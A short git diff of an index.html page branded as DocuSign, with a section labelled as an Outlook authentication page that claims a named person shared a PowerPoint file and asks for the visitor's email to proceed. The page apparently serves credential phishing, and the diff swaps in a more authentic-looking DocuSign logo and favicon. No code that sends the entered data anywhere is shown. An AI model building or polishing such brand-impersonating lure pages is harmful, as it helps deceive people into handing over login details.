--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <link rel="icon" type="image/svg" href="https://static.wikia.nocookie.net/logopedia/images/a/ac/DocuSign_2024_S.svg/revision/latest?cb=20240417143304">
+    <link rel="icon" type="image/svg" href="https://upload.wikimedia.org/wikipedia/commons/3/34/DocuSign_logo.png">
     <title>DocuSign</title>
     <style>
         body { 
@@ -69,7 +69,7 @@
 
     <!-- Outlook Authentication Page -->
     <div id="auth-page" class="container">
-        <img src="https://static.wikia.nocookie.net/logopedia/images/a/ac/DocuSign_2024_S.svg/revision/latest?cb=20240417143304" alt="Outlook Logo" class="logo"><br>
+        <img src="https://upload.wikimedia.org/wikipedia/commons/3/34/DocuSign_logo.png" alt="Outlook Logo" class="logo"><br>
         
         <p>Here's the PowerPoint file that <b>Max Warren</b> shared with you.</p><br><br>
         <input type="email" id="email" placeholder="Enter the recipient's email to proceed">
